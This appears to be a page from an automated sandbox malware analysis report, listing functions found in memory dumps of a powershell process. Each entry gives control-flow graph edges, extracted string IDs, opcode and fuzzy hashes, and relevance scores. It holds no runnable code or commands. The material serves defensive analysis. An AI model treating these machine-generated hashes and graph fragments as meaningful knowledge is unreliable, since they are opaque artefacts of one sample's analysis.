                                                • Not Executed
                                                control_flow_graph 1195 387e48-387e6d 1196 388060-3880aa 1195->1196 1197 387e73-387e78 1195->1197 1205 38822e-388275 1196->1205 1206 3880b0-3880b5 1196->1206 1198 387e7a-387e80 1197->1198 1199 387e90-387e94 1197->1199 1201 387e82 1198->1201 1202 387e84-387e8e 1198->1202 1203 387e9a-387e9c 1199->1203 1204 388010-38801a 1199->1204 1201->1199 1202->1199 1209 387eac 1203->1209 1210 387e9e-387eaa 1203->1210 1207 388028-38802e 1204->1207 1208 38801c-388025 1204->1208 1224 38827b-388280 1205->1224 1225 3883c1-3883f5 1205->1225 1214 3880cd-3880d1 1206->1214 1215 3880b7-3880bd 1206->1215 1211 388030-388032 1207->1211 1212 388034-388040 1207->1212 1216 387eae-387eb0 1209->1216 1210->1216 1218 388042-38805d 1211->1218 1212->1218 1221 3881e0-3881ea 1214->1221 1222 3880d7-3880d9 1214->1222 1219 3880bf 1215->1219 1220 3880c1-3880cb 1215->1220 1216->1204 1223 387eb6-387ed5 1216->1223 1219->1214 1220->1214 1226 3881ec-3881f4 1221->1226 1227 3881f7-3881fd 1221->1227 1229 3880e9 1222->1229 1230 3880db-3880e7 1222->1230 1256 387ee5 1223->1256 1257 387ed7-387ee3 1223->1257 1231 388298-38829c 1224->1231 1232 388282-388288 1224->1232 1246 388423-38842d 1225->1246 1247 3883f7-388419 1225->1247 1234 3881ff-388201 1227->1234 1235 388203-38820f 1227->1235 1236 3880eb-3880ed 1229->1236 1230->1236 1242 388371-38837b 1231->1242 1243 3882a2-3882a4 1231->1243 1240 38828a 1232->1240 1241 38828c-388296 1232->1241 1244 388211-38822b 1234->1244 1235->1244 1236->1221 1245 3880f3-388112 1236->1245 1240->1231 1241->1231 1249 388389-38838f 1242->1249 1250 38837d-388386 1242->1250 1251 3882a6-3882b7 1243->1251 1252 3882e7 1243->1252 1284 388122 1245->1284 1285 388114-388120 1245->1285 1261 38842f-388434 1246->1261 1262 388437-38843d 1246->1262 1293 38841b-388420 1247->1293 1294 38846d-388496 1247->1294 1258 388391-388393 1249->1258 1259 388395-3883a1 1249->1259 1251->1225 1279 3882bd-3882c5 1251->1279 1260 3882e9-3882eb 1252->1260 1266 387ee7-387ee9 1256->1266 1257->1266 1267 3883a3-3883be 1258->1267 1259->1267 1260->1242 1265 3882f1-3882f3 1260->1265 1268 38843f-388441 1262->1268 1269 388443-38844f 1262->1269 1272 38830d-388314 1265->1272 1273 3882f5-3882fb 1265->1273 1266->1204 1276 387eef-387ef6 1266->1276 1278 388451-38846a 1268->1278 1269->1278 1282 38832c-38836e 1272->1282 1283 388316-38831c 1272->1283 1280 3882fd 1273->1280 1281 3882ff-38830b 1273->1281 1276->1196 1286 387efc-387f01 1276->1286 1288 3882dd-3882e5 1279->1288 1289 3882c7-3882cd 1279->1289 1280->1272 1281->1272 1298 38831e 1283->1298 1299 388320-38832a 1283->1299 1295 388124-388126 1284->1295 1285->1295 1301 387f19-387f28 1286->1301 1302 387f03-387f09 1286->1302 1288->1260 1296 3882cf 1289->1296 1297 3882d1-3882db 1289->1297 1318 388498-3884be 1294->1318 1319 3884c5-3884f4 1294->1319 1295->1221 1304 38812c-388163 1295->1304 1296->1288 1297->1288 1298->1282 1299->1282 1301->1204 1315 387f2e-387f4c 1301->1315 1305 387f0b 1302->1305 1306 387f0d-387f17 1302->1306 1328 38817d-388184 1304->1328 1329 388165-38816b 1304->1329 1305->1301 1306->1301 1315->1204 1325 387f52-387f77 1315->1325 1318->1319 1326 38852d-388537 1319->1326 1327 3884f6-388513 1319->1327 1325->1204 1352 387f7d-387f84 1325->1352 1332 388539-38853d 1326->1332 1333 388540-388546 1326->1333 1344 38857d-388582 1327->1344 1345 388515-388527 1327->1345 1330 38819c-3881dd 1328->1330 1331 388186-38818c 1328->1331 1335 38816d 1329->1335 1336 38816f-38817b 1329->1336 1337 38818e 1331->1337 1338 388190-38819a 1331->1338 1342 388548-38854a 1333->1342 1343 38854c-388558 1333->1343 1335->1328 1336->1328 1337->1330 1338->1330 1347 38855a-38857a 1342->1347 1343->1347 1344->1345 1345->1326 1354 387fca-387ffd 1352->1354 1355 387f86-387fa1 1352->1355 1366 388004-38800d 1354->1366 1359 387fbb-387fbf 1355->1359 1360 387fa3-387fa9 1355->1360 1364 387fc6-387fc8 1359->1364 1361 387fab 1360->1361 1362 387fad-387fb9 1360->1362 1361->1359 1362->1359 1364->1366
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4'p$4'p$h%h$h%h$h%h$h%h$h%h$h%h$h%h$h%h
                                                • API String ID: 0-1353327930
                                                • Opcode ID: 516c0f33265116ed817403c361a8cea42dd941d03a09428914316d6dcd4d00f9
                                                • Instruction ID: 70a51881feb6b500f084a3fb8ef5531e69e038a0b0d37c4f49dd89f258534d5e
                                                • Opcode Fuzzy Hash: 516c0f33265116ed817403c361a8cea42dd941d03a09428914316d6dcd4d00f9
                                                • Instruction Fuzzy Hash: FD121675B043009FCB16AB788810B6ABBF6AFC9310F6984FAD545CB255DE71DC42C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04A4104C Relevance: 15.1, Strings: 11, Instructions: 1322COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.779886012.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_4a40000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$h%h$h%h$tPp$tPp$tPp$tPp$$p$$p$$p
                                                • API String ID: 0-820756644
                                                • Opcode ID: 405dc1245499daf02b84ac06d3f57aeffdbcc28655f3b2c769c4146871dbc19a
                                                • Instruction ID: e0d2e5594c72d35b3a02afbd4bbc128065f379e642fc31f7acbe9c618792fc20
                                                • Opcode Fuzzy Hash: 405dc1245499daf02b84ac06d3f57aeffdbcc28655f3b2c769c4146871dbc19a
                                                • Instruction Fuzzy Hash: C782E634B00204DFCB55DF68D454AAEBBF2AFC9310F58846AE955CB296DB31EC81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00380C30 Relevance: 14.3, Strings: 11, Instructions: 584COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1693 380c30-380c52 1694 380c58-380c5d 1693->1694 1695 380d52-380da1 1693->1695 1696 380c5f-380c65 1694->1696 1697 380c75-380c79 1694->1697 1703 380f84-380fb9 1695->1703 1704 380da7-380dac 1695->1704 1698 380c69-380c73 1696->1698 1699 380c67 1696->1699 1700 380c7f-380c81 1697->1700 1701 380d04-380d0e 1697->1701 1698->1697 1699->1697 1700->1701 1707 380c87-380c90 1700->1707 1705 380d1b-380d21 1701->1705 1706 380d10-380d18 1701->1706 1720 380fbb-380fca 1703->1720 1721 380fcc 1703->1721 1708 380dae-380db4 1704->1708 1709 380dc4-380dc8 1704->1709 1710 380d23-380d25 1705->1710 1711 380d27-380d33 1705->1711 1726 380ca8-380d01 1707->1726 1727 380c92-380c98 1707->1727 1713 380db8-380dc2 1708->1713 1714 380db6 1708->1714 1717 380dce-380dd8 1709->1717 1718 380f34-380f3e 1709->1718 1716 380d35-380d4f 1710->1716 1711->1716 1713->1709 1714->1709 1717->1703 1723 380dde-380de3 1717->1723 1724 380f4c-380f52 1718->1724 1725 380f40-380f49 1718->1725 1730 380fce-380fd0 1720->1730 1721->1730 1731 380dfb-380dff 1723->1731 1732 380de5-380deb 1723->1732 1733 380f58-380f64 1724->1733 1734 380f54-380f56 1724->1734 1736 380c9a 1727->1736 1737 380c9c-380c9e 1727->1737 1738 381076-381080 1730->1738 1739 380fd6-380fd8 1730->1739 1731->1718 1743 380e05-380e07 1731->1743 1740 380ded 1732->1740 1741 380def-380df9 1732->1741 1742 380f66-380f81 1733->1742 1734->1742 1736->1726 1737->1726 1746 38108b-381091 1738->1746 1747 381082-381088 1738->1747 1748 380fe8 1739->1748 1749 380fda-380fe6 1739->1749 1740->1731 1741->1731 1744 380e09-380e24 1743->1744 1745 380e26 1743->1745 1755 380e28-380e2a 1744->1755 1745->1755 1753 381093-381095 1746->1753 1754 381097-3810a3 1746->1754 1756 380fea-380fec 1748->1756 1749->1756 1759 3810a5-3810c0 1753->1759 1754->1759 1755->1718 1760 380e30-380e3a 1755->1760 1756->1738 1761 380ff2-381011 1756->1761 1760->1703 1764 380e40-380e45 1760->1764 1761->1738 1776 381013-38101a 1761->1776 1767 380e5d-380e6b 1764->1767 1768 380e47-380e4d 1764->1768 1767->1718 1775 380e71-380e8e 1767->1775 1770 380e4f 1768->1770 1771 380e51-380e5b 1768->1771 1770->1767 1771->1767 1775->1718 1791 380e94-380eb9 1775->1791 1778 381020-381025 1776->1778 1779 3810c3-3810f8 1776->1779 1781 38103d-38106a 1778->1781 1782 381027-38102d 1778->1782 1788 3810fa-381109 1779->1788 1789 38110b 1779->1789 1862 38106d call 380d78 1781->1862 1863 38106d call 380c30 1781->1863 1864 38106d call 380c10 1781->1864 1783 38102f 1782->1783 1784 381031-38103b 1782->1784 1783->1781 1784->1781 1790 38110d-38110f 1788->1790 1789->1790 1793 3811c4-3811ce 1790->1793 1794 381115-381117 1790->1794 1791->1718 1811 380ebb 1791->1811 1799 3811da-3811e0 1793->1799 1800 3811d0-3811d7 1793->1800 1796 381119-381125 1794->1796 1797 381127 1794->1797 1801 381129-38112b 1796->1801 1797->1801 1802 3811e2-3811e4 1799->1802 1803 3811e6-3811f2 1799->1803 1801->1793 1806 381131-381138 1801->1806 1805 3811f4-381210 1802->1805 1803->1805 1804 38106f-381073 1809 38113e-381143 1806->1809 1810 381213-381248 1806->1810 1813 38115b-38117f 1809->1813 1814 381145-38114b 1809->1814 1820 381258 1810->1820 1821 38124a-381256 1810->1821 1818 380ec5-380ec9 1811->1818 1825 381199-3811a7 1813->1825 1826 381181-381187 1813->1826 1815 38114d 1814->1815 1816 38114f-381159 1814->1816 1815->1813 1816->1813 1822 380ecb-380ed1 1818->1822 1823 380ee3-380f31 1818->1823 1828 38125a-38125c 1820->1828 1821->1828 1829 380ed3 1822->1829 1830 380ed5-380ee1 1822->1830 1849 3811ae-3811c1 1825->1849 1831 381189 1826->1831 1832 38118b-381197 1826->1832 1834 38125e-381260 1828->1834 1835 3812d6-3812e0 1828->1835 1829->1823 1830->1823 1831->1825 1832->1825 1841 381270 1834->1841 1842 381262-38126e 1834->1842 1839 3812eb-3812f1 1835->1839 1840 3812e2-3812e8 1835->1840 1843 3812f3-3812f5 1839->1843 1844 3812f7-381303 1839->1844 1845 381272-381274 1841->1845 1842->1845 1847 381305-38131e 1843->1847 1844->1847 1845->1835 1848 381276-38127c 1845->1848 1851 38128a-381293 1848->1851 1852 38127e-381280 1848->1852 1853 3812a1-3812be 1851->1853 1854 381295-381297 1851->1854 1852->1851 1859 3812c0-3812d0 1853->1859 1860 381321-381326 1853->1860 1854->1853 1859->1835 1860->1859 1862->1804 1863->1804 1864->1804
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4:)$X:)$h%h$h%h$$p$$p$$p$9)$9)
                                                • API String ID: 0-4165405828
                                                • Opcode ID: 73f208c8e2521b8fc1f686e8b7c6d8fa559bcad246b478709dd99eb3c063bd9d
                                                • Instruction ID: 9528a809f8bf0a9f8fdb522c3ad70806151762e2524fb1e49192b41a3b94c2a1
                                                • Opcode Fuzzy Hash: 73f208c8e2521b8fc1f686e8b7c6d8fa559bcad246b478709dd99eb3c063bd9d
                                                • Instruction Fuzzy Hash: 48126A317043409FDB6AAF68C85066ABBFAAFC5310F29C4EAD544CB252CB71ED46C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038FA35 Relevance: 11.6, Strings: 9, Instructions: 309COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1865 38fa35-38fa4d 1866 38fa5b-38fa7a 1865->1866 1867 38fa4f-38fa5a 1865->1867 1868 38fa80-38fa85 1866->1868 1869 38fc43-38fc96 1866->1869 1867->1866 1870 38fa9d-38faa1 1868->1870 1871 38fa87-38fa8d 1868->1871 1883 38fc98-38fc9e 1869->1883 1884 38fcae-38fcb2 1869->1884 1875 38fbee-38fbf8 1870->1875 1876 38faa7-38faab 1870->1876 1872 38fa8f 1871->1872 1873 38fa91-38fa9b 1871->1873 1872->1870 1873->1870 1878 38fbfa-38fc03 1875->1878 1879 38fc06-38fc0c 1875->1879 1880 38faeb 1876->1880 1881 38faad-38fabe 1876->1881 1886 38fc0e-38fc10 1879->1886 1887 38fc12-38fc1e 1879->1887 1882 38faed-38faef 1880->1882 1881->1869 1900 38fac4-38fac9 1881->1900 1882->1875 1888 38faf5-38faf9 1882->1888 1889 38fca0 1883->1889 1890 38fca2-38fcac 1883->1890 1892 38fcb8-38fcba 1884->1892 1893 38fdd5-38fddf 1884->1893 1891 38fc20-38fc40 1886->1891 1887->1891 1895 38fafb-38fb0a 1888->1895 1896 38fb0c 1888->1896 1889->1884 1890->1884 1898 38fcca 1892->1898 1899 38fcbc-38fcc8 1892->1899 1901 38fded-38fdf3 1893->1901 1902 38fde1-38fdea 1893->1902 1905 38fb0e-38fb10 1895->1905 1896->1905 1907 38fccc-38fcce 1898->1907 1899->1907 1908 38facb-38fad1 1900->1908 1909 38fae1-38fae9 1900->1909 1903 38fdf9-38fe05 1901->1903 1904 38fdf5-38fdf7 1901->1904 1911 38fe07-38fe22 1903->1911 1904->1911 1905->1875 1912 38fb16-38fb1a 1905->1912 1907->1893 1915 38fcd4-38fcf3 1907->1915 1913 38fad3 1908->1913 1914 38fad5-38fadf 1908->1914 1909->1882 1917 38fb1c-38fb25 1912->1917 1918 38fb3d 1912->1918 1913->1909 1914->1909 1933 38fd12 1915->1933 1934 38fcf5-38fd10 1915->1934 1921 38fb2c-38fb39 1917->1921 1922 38fb27-38fb2a 1917->1922 1923 38fb40-38fb5a 1918->1923 1926 38fb3b 1921->1926 1922->1926 1931 38fb5c-38fb65 1923->1931 1932 38fb7d 1923->1932 1926->1923 1935 38fb6c-38fb79 1931->1935 1936 38fb67-38fb6a 1931->1936 1938 38fb80-38fb84 1932->1938 1937 38fd14-38fd16 1933->1937 1934->1937 1939 38fb7b 1935->1939 1936->1939 1937->1893 1941 38fd1c-38fd53 1937->1941 1943 38fb89-38fb8b 1938->1943 1939->1938 1954 38fd6d-38fd6f 1941->1954 1955 38fd55-38fd5b 1941->1955 1946 38fb8d-38fb93 1943->1946 1947 38fba5-38fbeb 1943->1947 1949 38fb95 1946->1949 1950 38fb97-38fba3 1946->1950 1949->1947 1950->1947 1958 38fd76-38fd78 1954->1958 1956 38fd5d 1955->1956 1957 38fd5f-38fd6b 1955->1957 1956->1954 1957->1954 1960 38fd7a-38fd80 1958->1960 1961 38fd90-38fdd2 1958->1961 1962 38fd82 1960->1962 1963 38fd84-38fd86 1960->1963 1962->1961 1963->1961
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4'p$4'p$h%h$h%h$$p$$p$$p
                                                • API String ID: 0-3203698697
                                                • Opcode ID: a4efb5017d178026af7732477fa01f8a273dd7d63c76acf584f0b0eac59141e2
                                                • Instruction ID: 5343c1639d7df14ac0ba9c469dd038c1a7821bc6466b41c9d02e2b2760c08263
                                                • Opcode Fuzzy Hash: a4efb5017d178026af7732477fa01f8a273dd7d63c76acf584f0b0eac59141e2
                                                • Instruction Fuzzy Hash: 46A1F531B04305DFCB2AAE38D4506AABBF2AF85320F2580FAD955CB255DB35CD85CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00384650 Relevance: 8.0, Strings: 6, Instructions: 493COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$h%h$h%h$h%h$h%h$[h
                                                • API String ID: 0-1348317926
                                                • Opcode ID: 0ce74ef26ad803bd609da32c815e10500ae5a8f37670c8e27bcdd5b2c12b5c5f
                                                • Instruction ID: 3749056d8a646a982b662926dacd19e9fadf67f9ad7a8bc77d982b8f3c833256
                                                • Opcode Fuzzy Hash: 0ce74ef26ad803bd609da32c815e10500ae5a8f37670c8e27bcdd5b2c12b5c5f
                                                • Instruction Fuzzy Hash: 49224A78A01305EFDB15DF58D580A6ABBB2EF89314F25C0A9E914AF756C771EC42CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00388B30 Relevance: 7.8, Strings: 6, Instructions: 302COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2163 388b30-388b55 2164 388b5b-388b60 2163->2164 2165 388caf-388cfa 2163->2165 2166 388b78-388b7c 2164->2166 2167 388b62-388b68 2164->2167 2175 388d00-388d05 2165->2175 2176 388e11-388e45 2165->2176 2168 388c5f-388c69 2166->2168 2169 388b82-388b84 2166->2169 2170 388b6a 2167->2170 2171 388b6c-388b76 2167->2171 2177 388c6b-388c74 2168->2177 2178 388c77-388c7d 2168->2178 2173 388b86-388b97 2169->2173 2174 388bc7 2169->2174 2170->2166 2171->2166 2173->2165 2198 388b9d-388ba5 2173->2198 2179 388bc9-388bcb 2174->2179 2183 388d1d-388d21 2175->2183 2184 388d07-388d0d 2175->2184 2199 388e55 2176->2199 2200 388e47-388e53 2176->2200 2180 388c7f-388c81 2178->2180 2181 388c83-388c8f 2178->2181 2179->2168 2189 388bd1-388bf5 2179->2189 2185 388c91-388cac 2180->2185 2181->2185 2186 388dc3-388dcd 2183->2186 2187 388d27-388d29 2183->2187 2190 388d0f 2184->2190 2191 388d11-388d1b 2184->2191 2193 388dda-388de0 2186->2193 2194 388dcf-388dd7 2186->2194 2196 388d39 2187->2196 2197 388d2b-388d37 2187->2197 2225 388c0f-388c16 2189->2225 2226 388bf7-388bfd 2189->2226 2190->2183 2191->2183 2203 388de2-388de4 2193->2203 2204 388de6-388df2 2193->2204 2205 388d3b-388d3d 2196->2205 2197->2205 2207 388bbd-388bc5 2198->2207 2208 388ba7-388bad 2198->2208 2201 388e57-388e59 2199->2201 2200->2201 2210 388e5b-388e61 2201->2210 2211 388ea5-388eaf 2201->2211 2212 388df4-388e0e 2203->2212 2204->2212 2205->2186 2213 388d43-388d49 2205->2213 2207->2179 2214 388baf 2208->2214 2215 388bb1-388bbb 2208->2215 2216 388e6f-388e8c 2210->2216 2217 388e63-388e65 2210->2217 2222 388eba-388ec0 2211->2222 2223 388eb1-388eb7 2211->2223 2219 388d4b-388d4d 2213->2219 2220 388d57-388dc0 2213->2220 2214->2207 2215->2207 2238 388e8e-388e9f 2216->2238 2239 388ef2-388ef7 2216->2239 2217->2216 2219->2220 2228 388ec2-388ec4 2222->2228 2229 388ec6-388ed2 2222->2229 2237 388c1c-388c5c 2225->2237 2231 388bff 2226->2231 2232 388c01-388c0d 2226->2232 2235 388ed4-388eef 2228->2235 2229->2235 2231->2225 2232->2225 2238->2211 2239->2238
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$8#h$h%h$h%h$h%h$h%h
                                                • API String ID: 0-216181455
                                                • Opcode ID: 54d4a2cf9696acae951fb2fdfb6c40d82aa9b50f85bfc39b3a1b39e4a16a3c93
                                                • Instruction ID: b4513a2ec85d9ab241d361bc993083e1e4788c4467e1ddec6df79507503c55bc
                                                • Opcode Fuzzy Hash: 54d4a2cf9696acae951fb2fdfb6c40d82aa9b50f85bfc39b3a1b39e4a16a3c93
                                                • Instruction Fuzzy Hash: D3A12635B043409FCB16AB6C880066AFBB6AFC9310FA984FAD515CB295DF31DC45C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00384CCC Relevance: 6.7, Strings: 5, Instructions: 465COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2248 384ccc-384cf9 2251 384cfb-384d00 2248->2251 2252 384d05-384d37 2248->2252 2255 384e46-384e61 2251->2255 2265 384d39-384d3e 2252->2265 2266 384d40 2252->2266 2257 384e8a-384e94 2255->2257 2258 384e63-384e82 2255->2258 2259 384e9a-384e9f 2257->2259 2260 384f71-384fa9 2257->2260 2258->2257 2263 384ea1-384ea7 2259->2263 2264 384eb7-384ec6 2259->2264 2306 3846dc-3846e2 2260->2306 2307 384fae-384fc2 2260->2307 2267 384ea9 2263->2267 2268 384eab-384eb5 2263->2268 2264->2260 2270 384ecc-384ed1 2264->2270 2271 384d45-384d59 2265->2271 2266->2271 2267->2264 2268->2264 2272 384ee9-384ef6 2270->2272 2273 384ed3-384ed9 2270->2273 2279 384d5b-384d7a 2271->2279 2280 384d82-384d8c 2271->2280 2272->2260 2278 384ef8-384f13 2272->2278 2276 384edb 2273->2276 2277 384edd-384ee7 2273->2277 2276->2272 2277->2272 2292 384f2d-384f6f 2278->2292 2293 384f15-384f1b 2278->2293 2279->2280 2280->2260 2282 384d92-384d97 2280->2282 2283 384d99-384d9f 2282->2283 2284 384daf-384dbe 2282->2284 2289 384da1 2283->2289 2290 384da3-384dad 2283->2290 2284->2260 2291 384dc4-384dcc 2284->2291 2289->2284 2290->2284 2296 384dce-384dd4 2291->2296 2297 384de4-384e24 2291->2297 2292->2307 2294 384f1d 2293->2294 2295 384f1f-384f2b 2293->2295 2294->2292 2295->2292 2301 384dd8-384de2 2296->2301 2302 384dd6 2296->2302 2324 384e29-384e41 2297->2324 2301->2297 2302->2297 2312 3846eb-384706 2306->2312 2313 3846e4 2306->2313 2310 384feb-385023 2307->2310 2311 384fc4-384fe3 2307->2311 2343 385024 2310->2343 2311->2310 2317 384708-384727 2312->2317 2318 38472f-384739 2312->2318 2313->2312 2316 384823-38483e 2313->2316 2321 384840-38485f 2316->2321 2322 384867-3848aa 2316->2322 2317->2318 2318->2260 2320 38473f-384744 2318->2320 2326 38475c-38476b 2320->2326 2327 384746-38474c 2320->2327 2321->2322 2344 3848b1-3848bb 2322->2344 2324->2344 2326->2260 2332 384771-384779 2326->2332 2330 38474e 2327->2330 2331 384750-38475a 2327->2331 2330->2326 2331->2326 2336 38477b-384781 2332->2336 2337 384791-38481c 2332->2337 2340 384783 2336->2340 2341 384785-38478f 2336->2341 2337->2316 2340->2337 2341->2337 2343->2343 2344->2260 2348 3848c1-3848c6 2344->2348 2349 3848c8-3848ce 2348->2349 2350 3848de-3848fd 2348->2350 2352 3848d0 2349->2352 2353 3848d2-3848dc 2349->2353 2354 38492c-384936 2350->2354 2355 3848ff-384929 2350->2355 2352->2350 2353->2350 2354->2260 2356 38493c-384941 2354->2356 2355->2354 2359 384959-38498a 2356->2359 2360 384943-384949 2356->2360 2359->2260 2368 384990-384998 2359->2368 2363 38494b 2360->2363 2364 38494d-384957 2360->2364 2363->2359 2364->2359 2370 38499a-3849a0 2368->2370 2371 3849b0-3849c2 2368->2371 2373 3849a2 2370->2373 2374 3849a4-3849ae 2370->2374 2371->2260 2375 3849c8-3849cf 2371->2375 2373->2371 2374->2371 2376 3849d1-3849d7 2375->2376 2377 3849e7-384a0d 2375->2377 2379 3849d9 2376->2379 2380 3849db-3849e5 2376->2380 2441 384a10 call 380d78 2377->2441 2442 384a10 call 380c30 2377->2442 2443 384a10 call 380c10 2377->2443 2379->2377 2380->2377 2384 384a12-384a1e 2384->2260 2385 384a24-384a29 2384->2385 2386 384a2b-384a31 2385->2386 2387 384a41-384a4e 2385->2387 2388 384a33 2386->2388 2389 384a35-384a3f 2386->2389 2387->2260 2390 384a54-384a73 2387->2390 2388->2387 2389->2387 2393 384a8d-384aa2 2390->2393 2394 384a75-384a7b 2390->2394 2444 384aa5 call 380d78 2393->2444 2445 384aa5 call 380c30 2393->2445 2446 384aa5 call 380c10 2393->2446 2395 384a7d 2394->2395 2396 384a7f-384a8b 2394->2396 2395->2393 2396->2393 2399 384aa7-384ac7 2399->2255 2402 384acd-384aff 2399->2402 2405 384b28-384b32 2402->2405 2406 384b01-384b20 2402->2406 2407 384b38-384b3d 2405->2407 2408 384c95-384cca 2405->2408 2406->2405 2410 384b3f-384b45 2407->2410 2411 384b55-384b67 2407->2411 2408->2271 2412 384b49-384b53 2410->2412 2413 384b47 2410->2413 2411->2408 2414 384b6d-384b75 2411->2414 2412->2411 2413->2411 2416 384b8d-384bbb 2414->2416 2417 384b77-384b7d 2414->2417 2416->2408 2424 384bc1-384bc9 2416->2424 2418 384b7f 2417->2418 2419 384b81-384b8b 2417->2419 2418->2416 2419->2416 2426 384bcb-384bd1 2424->2426 2427 384be1-384c52 2424->2427 2428 384bd3 2426->2428 2429 384bd5-384bdf 2426->2429 2447 384c55 call 3819b0 2427->2447 2448 384c55 call 3819d0 2427->2448 2428->2427 2429->2427 2437 384c57-384c90 2437->2271 2441->2384 2442->2384 2443->2384 2444->2399 2445->2399 2446->2399 2447->2437 2448->2437
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$h%h$h%h$h%h$[h
                                                • API String ID: 0-3945192550
                                                • Opcode ID: 6e6e2735d29066de443bd1173a915ab0f5819de2d6f65a9fa8f2701ed02a266d
                                                • Instruction ID: f3596d33f511622a5a5d665d19661ff7e40d1f071ac12beb15a48eccf921ed9c
                                                • Opcode Fuzzy Hash: 6e6e2735d29066de443bd1173a915ab0f5819de2d6f65a9fa8f2701ed02a266d
                                                • Instruction Fuzzy Hash: 14124C78A01305EFDB15DF58D580E6ABBB2EF88314F25C0A9E915ABB56C771EC42CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003819D0 Relevance: 6.3, Strings: 5, Instructions: 94COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2449 3819d0-3819e0 2450 3819f0 2449->2450 2451 3819e2-3819ee 2449->2451 2452 3819f2-3819f4 2450->2452 2451->2452 2453 381a88-381a92 2452->2453 2454 3819fa-3819fc 2452->2454 2455 381a9d-381aa3 2453->2455 2456 381a94-381a9a 2453->2456 2457 381a0c 2454->2457 2458 3819fe-381a0a 2454->2458 2460 381aa9-381ab5 2455->2460 2461 381aa5-381aa7 2455->2461 2459 381a0e-381a10 2457->2459 2458->2459 2459->2453 2462 381a12-381a2a 2459->2462 2463 381ab7-381ac7 2460->2463 2461->2463 2467 381a2c-381a32 2462->2467 2468 381a44-381a63 2462->2468 2469 381acc-381ad0 2463->2469 2470 381a34 2467->2470 2471 381a36-381a42 2467->2471 2474 381ad3-381ad8 2468->2474 2475 381a65-381a82 2468->2475 2470->2468 2471->2468 2474->2475 2475->2453
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: x;)$x;)$$p$$p$$p
                                                • API String ID: 0-2412576120
                                                • Opcode ID: 099d6e1168cbd38abaf8558e32ee690c31283b2ff06be92c7780f3a8600d2c3a
                                                • Instruction ID: 3757ee575b130d0752fbacc4b852d5043a984540687bf0a591be1450b421b673
                                                • Opcode Fuzzy Hash: 099d6e1168cbd38abaf8558e32ee690c31283b2ff06be92c7780f3a8600d2c3a
                                                • Instruction Fuzzy Hash: 6F214735700301ABDB29696DD840B3BABDE9BC4310F38846AD446C7385CEB9CD42C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00385068 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
